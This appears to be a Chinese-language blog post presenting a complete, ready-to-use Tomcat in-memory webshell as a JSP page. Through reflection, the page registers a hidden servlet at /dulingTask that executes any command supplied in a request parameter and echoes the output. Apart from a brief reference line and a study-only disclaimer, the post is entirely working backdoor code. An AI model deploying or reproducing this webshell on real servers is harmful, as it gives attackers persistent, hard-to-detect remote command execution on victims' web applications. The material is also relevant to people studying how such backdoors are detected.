能直接使用的内存马学习-servlet篇

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/**
* @Author novy
* @Date 2021/9/14 9:09
* @Version 1.0
*/

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import = "org.apache.catalina.core.ApplicationContext"%>
<%@ page import = "org.apache.catalina.core.StandardContext"%>
<%@ page import = "javax.servlet.*"%>
<%@ page import = "javax.servlet.annotation.WebServlet"%>
<%@ page import = "javax.servlet.http.HttpServlet"%>
<%@ page import = "javax.servlet.http.HttpServletRequest"%>
<%@ page import = "javax.servlet.http.HttpServletResponse"%>
<%@ page import = "java.io.IOException"%>
<%@ page import = "java.lang.reflect.Field"%>
<%@ page import = "java.io.InputStream"%>
<%@ page import = "java.io.BufferedReader"%>
<%@ page import = "java.io.InputStreamReader"%>


<%
class InitTaskServlet implements Servlet{
@Override
public void init(ServletConfig config) throws ServletException {}
@Override
public String getServletInfo() {return null;}
@Override
public void destroy() {} public ServletConfig getServletConfig() {return null;}

@Override
public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
HttpServletRequest request1 = (HttpServletRequest) req;
HttpServletResponse response1 = (HttpServletResponse) res;
String task = request1.getParameter("taskdilng");
if (task != null){
// Process aa = Runtime.getRuntime().exec(task);
InputStream fis = new ProcessBuilder(task).start().getInputStream();
// response1.setContentType("text/html");
// PrintWriter out = response1.getWriter();
// System.out.println("res: "+aa);
//InputStream fis=aa.getInputStream();
InputStreamReader isr=new InputStreamReader(fis);
BufferedReader br=new BufferedReader(isr);
String line=null;
while((line=br.readLine())!=null) {
response.getWriter().println("res: "+line);
}
}
else{
response1.sendError(HttpServletResponse.SC_NOT_FOUND);
}
}
}
%>

<%
ServletContext servletContext = request.getSession().getServletContext();
Field appctx = servletContext.getClass().getDeclaredField("context");
appctx.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
Field stdctx = applicationContext.getClass().getDeclaredField("context");
stdctx.setAccessible(true);
StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
InitTaskServlet initServlet = new InitTaskServlet();
org.apache.catalina.Wrapper inittWrapper = standardContext.createWrapper();
inittWrapper.setName("inittPage");
inittWrapper.setLoadOnStartup(1);
inittWrapper.setServlet(initServlet);
inittWrapper.setServletClass(initServlet.getClass().getName());
standardContext.addChild(inittWrapper);
standardContext.addServletMapping("/dulingTask", "inittPage");
out.println("susscess");
%>

参考:
JAVA本地命令执行-ProcessBuilder命令执行


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.